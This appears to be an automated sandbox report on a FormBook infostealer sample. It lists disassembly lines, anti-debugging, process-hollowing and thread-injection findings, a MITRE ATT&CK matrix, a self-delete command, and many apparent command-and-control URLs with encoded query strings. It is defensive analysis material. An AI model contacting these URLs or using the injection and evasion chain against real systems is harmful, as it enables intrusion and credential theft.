          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A83540 mov eax, dword ptr fs:[00000030h]1_2_00A83540
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AB3D40 mov eax, dword ptr fs:[00000030h]1_2_00AB3D40
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A27D50 mov eax, dword ptr fs:[00000030h]1_2_00A27D50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A846A7 mov eax, dword ptr fs:[00000030h]1_2_00A846A7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FE87 mov eax, dword ptr fs:[00000030h]1_2_00A9FE87
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A316E0 mov ecx, dword ptr fs:[00000030h]1_2_00A316E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A176E2 mov eax, dword ptr fs:[00000030h]1_2_00A176E2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A48EC7 mov eax, dword ptr fs:[00000030h]1_2_00A48EC7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]1_2_00ABFEC0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A336CC mov eax, dword ptr fs:[00000030h]1_2_00A336CC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]1_2_00AD8ED6
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0E620 mov eax, dword ptr fs:[00000030h]1_2_00A0E620
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFE3F mov eax, dword ptr fs:[00000030h]1_2_00ABFE3F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A38E00 mov eax, dword ptr fs:[00000030h]1_2_00A38E00
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1608 mov eax, dword ptr fs:[00000030h]1_2_00AC1608
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]1_2_00A3A61C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]1_2_00A3A61C
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1766D mov eax, dword ptr fs:[00000030h]1_2_00A1766D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]1_2_00ACAE44
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]1_2_00ACAE44
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A18794 mov eax, dword ptr fs:[00000030h]1_2_00A18794
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A437F5 mov eax, dword ptr fs:[00000030h]1_2_00A437F5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]1_2_00A04F2E
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]1_2_00A04F2E
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3E730 mov eax, dword ptr fs:[00000030h]1_2_00A3E730
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]1_2_00AD070D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]1_2_00AD070D
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]1_2_00A3A70E
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]1_2_00A3A70E
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2F716 mov eax, dword ptr fs:[00000030h]1_2_00A2F716
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]1_2_00A9FF10
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]1_2_00A9FF10
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1FF60 mov eax, dword ptr fs:[00000030h]1_2_00A1FF60
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8F6A mov eax, dword ptr fs:[00000030h]1_2_00AD8F6A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1EF40 mov eax, dword ptr fs:[00000030h]1_2_00A1EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462746D mov eax, dword ptr fs:[00000030h]6_2_0462746D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A44B mov eax, dword ptr fs:[00000030h]6_2_0463A44B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h]6_2_0469C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h]6_2_0469C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463BC2C mov eax, dword ptr fs:[00000030h]6_2_0463BC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]6_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]6_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]6_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]6_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]6_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]6_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]6_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]6_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C14FB mov eax, dword ptr fs:[00000030h]6_2_046C14FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]6_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]6_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]6_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8CD6 mov eax, dword ptr fs:[00000030h]6_2_046D8CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461849B mov eax, dword ptr fs:[00000030h]6_2_0461849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h]6_2_0462C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h]6_2_0462C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04643D43 mov eax, dword ptr fs:[00000030h]6_2_04643D43
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04683540 mov eax, dword ptr fs:[00000030h]6_2_04683540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04627D50 mov eax, dword ptr fs:[00000030h]6_2_04627D50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460AD30 mov eax, dword ptr fs:[00000030h]6_2_0460AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]6_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CE539 mov eax, dword ptr fs:[00000030h]6_2_046CE539
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]6_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]6_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]6_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8D34 mov eax, dword ptr fs:[00000030h]6_2_046D8D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0468A537 mov eax, dword ptr fs:[00000030h]6_2_0468A537
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h]6_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h]6_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]6_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]6_2_046CFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,0_2_740D1000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Section loaded: unknown target: C:\Users\user\Desktop\NdBLyH2h5d.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 300000
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Source: explorer.exe, 00000004.00000002.478596652.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook (same Yara match sources as listed under Stealing of Sensitive Information)

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 3 | OS Credential Dumping | Security Software Discovery 141 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 11 | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

Behavior Graph ID: 385309, Sample: NdBLyH2h5d.exe, Startdate: 12/04/2021, Architecture: WINDOWS, Score: 100

Start
  DNS/IP: www.plaisterpress.com; www.missjeschickt.com; missjeschickt.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures
  started NdBLyH2h5d.exe 18
    DNS/IP: 192.168.2.1 unknown unknown
    Dropped: C:\Users\user\AppData\...\6oxdti6l9qd.dll, PE32
    Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
    started NdBLyH2h5d.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      injected explorer.exe
        DNS/IP: missjeschickt.com 81.169.145.72, 49734, 80 STRATOSTRATOAGDE Germany; zagorafinancial.com 162.209.114.201, 49723, 80 RACKSPACEUS United States; 20 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        started rundll32.exe
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          started cmd.exe 1
            started conhost.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
NdBLyH2h5d.exe | 21% | Virustotal |
NdBLyH2h5d.exe | 8% | Metadefender |
NdBLyH2h5d.exe | 29% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
6.2.rundll32.exe.4d44f8.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.NdBLyH2h5d.exe.2640000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.NdBLyH2h5d.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.NdBLyH2h5d.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.2.rundll32.exe.4b17960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.fibermover.com/uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp | 100% | Avira URL Cloud | malware
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.przyczepy.net/uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.montcoimmigrationlawyer.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.funnyfootballmugs.com/uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          www.montcoimmigrationlawyer.com/uoe8/ | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.mojilifenoosa.com/uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.3992199.com/uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.zagorafinancial.com/uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
